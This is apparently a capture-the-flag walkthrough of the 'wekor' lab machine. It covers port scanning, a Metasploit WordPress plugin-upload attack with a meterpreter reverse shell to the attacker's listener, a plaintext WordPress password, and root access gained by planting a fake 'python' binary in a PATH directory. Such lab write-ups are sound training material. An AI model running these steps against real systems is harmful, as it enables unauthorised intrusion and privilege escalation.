# Nmap 7.93 scan initiated Thu Nov 24 22:26:41 2022 as: nmap -sSVC -T4 -v -oA scans/nmap/wekor.thm -p- wekor.thm Nmap scan report for wekor.thm (10.10.129.101) Host is up (0.026s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 95c3ceaf07fae28e2904e4cd146a21b5 (RSA) | 256 4d99b568afbb4e66ce7270e6e3f896a4 (ECDSA) |_ 256 0de57de81a12c0ddb7665e98345559f6 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 9 disallowed entries | /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot |_/comingreallysoon /interesting |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.18 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Nov 24 22:27:13 2022 -- 1 IP address (1 host up) scanned in 31.36 seconds
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD EDITED yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.96.236 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /wordpress/ yes The base path to the wordpress application USERNAME wp_yura yes The WordPress username to authenticate with VHOST site.wekor.thm no HTTP server virtual host
Payload information:
Description: This module will generate a plugin, pack the payload into it and upload it to a server running WordPress provided valid admin credentials are used.
In my case, it didn't work, the plugin was uploaded but wasn't activated.
1 2 3 4 5 6 7 8 9 10
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 10.18.25.199:4444 [*] Authenticating with WordPress using wp_yura:soccer13... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [-] Failed to acquire the plugin upload nonce [-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload [*] Exploit completed, but no session was created.
So instead I started a handler with the same configuration:
Name Current Setting Required Description ---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Wildcard Target
But because MSF aborted before the end, the uploaded plugin is just a void skeleton.
meterpreter > getuid Server username: www-data meterpreter > sysinfo Computer : osboxes OS : Linux osboxes 4.15.0-132-generic #136~16.04.1-Ubuntu SMP Tue Jan 12 18:18:45 UTC 2021 i686 Meterpreter : php/linux meterpreter > cat /etc/os-release NAME="Ubuntu" VERSION="16.04.6 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.6 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" VERSION_CODENAME=xenial UBUNTU_CODENAME=xenial
There is a user Orka but wa can't read the files (.bash_history or user.txt) in its home directory.
So we'll probably have to loot info elsewhere or exploit a service.
By listing processes, we can see there are tons of apache workers, a DE must be installed since there is Xorg and a DM (lightdm) running. But the promisign services for us are the following:
Elevation of privilege (EoP) - from www-data to Orka#
Then we can conbnect to the memcache server and enumerate info.
1 2 3 4 5 6
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ telnet localhost 11211 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. version VERSION 1.4.25 Ubuntu
stats slabs STAT 1:chunk_size 80 STAT 1:chunks_per_page 13107 STAT 1:total_pages 1 STAT 1:total_chunks 13107 STAT 1:used_chunks 5 STAT 1:free_chunks 13102 STAT 1:free_chunks_end 0 STAT 1:mem_requested 321 STAT 1:get_hits 0 STAT 1:cmd_set 105 STAT 1:delete_hits 0 STAT 1:incr_hits 0 STAT 1:decr_hits 0 STAT 1:cas_hits 0 STAT 1:cas_badval 0 STAT 1:touch_hits 0 STAT active_slabs 1 STAT total_malloced 1048560
quit Connection closed by foreign host. www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ su Orka Password: Orka@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ cd Orka@osboxes:~$ id uid=1001(Orka) gid=1001(Orka) groups=1001(Orka)
Elevation of privilege (EoP) - from www-data to root#
At least the way of EoP is straightforward.
1 2 3 4 5 6 7 8 9
Orka@osboxes:~$ sudo -l [sudo] password for Orka:
Matching Defaults entries for Orka on osboxes: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User Orka may run the following commands on osboxes: (root) /home/Orka/Desktop/bitcoin
It's a executable we can execute or read but not write.
1 2 3 4 5
Orka@osboxes:~$ ls -lh /home/Orka/Desktop/bitcoin -rwxr-xr-x 1 root root 7.6K Jan 23 2021 /home/Orka/Desktop/bitcoin
Orka@osboxes:~$ file /home/Orka/Desktop/bitcoin /home/Orka/Desktop/bitcoin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8280915d0ebb7225ed63f226c15cee11ce960b6b, not stripped
The program is asking for a password and reflect the user input. Also it seems vulnerable to a buffer overflow.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Orka@osboxes:~$ /home/Orka/Desktop/bitcoin Enter the password : x x Access Denied...
Orka@osboxes:~$ /home/Orka/Desktop/bitcoin Enter the password : %s %s Access Denied...
Orka@osboxes:~$ /home/Orka/Desktop/bitcoin Enter the password : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Access Denied... Segmentation fault (core dumped)
By running strings we get the password that is password.
Orka@osboxes:~$ strings -d -n 6 /home/Orka/Desktop/bitcoin /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used sprintf __isoc99_scanf __stack_chk_fail __ctype_b_loc system strcmp __libc_start_main __gmon_start__ GLIBC_2.3 GLIBC_2.7 GLIBC_2.4 GLIBC_2.0 Enter the password : password Access Denied... Access Granted... User Manual: Maximum Amount Of BitCoins Possible To Transfer at a time : 9 Amounts with more than one number will be stripped off! And Lastly, be careful, everything is logged :) Amount Of BitCoins : Sorry, This is not a valid amount! python /home/Orka/Desktop/transfer.py %c ;*2$",
1 2 3 4 5 6 7 8 9 10 11 12 13
Orka@osboxes:~/Desktop$ ./bitcoin Enter the password : password password Access Granted... User Manual: Maximum Amount Of BitCoins Possible To Transfer at a time : 9 Amounts with more than one number will be stripped off! And Lastly, be careful, everything is logged :) Amount Of BitCoins : 5 Saving 5 BitCoin(s) For Later Use Do you want to make a transfer? Y/N : Y Transfering 5 BitCoin(s) Transfer Completed Successfully...
Also we can see the program calls /home/Orka/Desktop/transfer.py at some point.
1 2
Orka@osboxes:~$ ls -lh /home/Orka/Desktop/transfer.py -rwxr--r-- 1 root root 588 Jan 23 2021 /home/Orka/Desktop/transfer.py
In some other context we could store our malicious python anywhere and not necessary in /usr/sbin, write anywhere (in /tmp, /dev/shm, /home/Orka, etc.), change our PATH and pass our PATH to sudo.
1 2 3 4 5 6
$ hackdir=$(mktemp -d) $ echo '#!/bin/bash' > "$hackdir/python" $ echo '/bin/bash' >> "$hackdir/python" $ export PATH=$hackdir:$PATH $ sudo -u root -E /home/Orka/Desktop/bitcoin sudo: sorry, you are not allowed to preserve the environment
But here we can't since there is an env_reset and secure_path.
env_reset was exploitable until sudo 1.8.5 but we have a patched version.
1 2 3 4 5
Orka@osboxes:~/Desktop$ sudo --version Sudo version 1.8.16 Sudoers policy plugin version 1.8.16 Sudoers file grammar version 45 Sudoers I/O plugin version 1.8.16
So no way to bypass it, we have to use the intended write to /usr/sbin.
1 2 3 4 5 6 7 8 9 10 11 12 13 14
$ cp "$hackdir/python" /usr/sbin/ $ chmod +x /usr/sbin/python $ sudo -u root /home/Orka/Desktop/bitcoin Enter the password : password Access Granted... User Manual: Maximum Amount Of BitCoins Possible To Transfer at a time : 9 Amounts with more than one number will be stripped off! And Lastly, be careful, everything is logged :) Amount Of BitCoins : 5 root@osboxes:~/Desktop# id uid=0(root) gid=0(root) groups=0(root) root@osboxes:~# cat /root/root.txt EDITED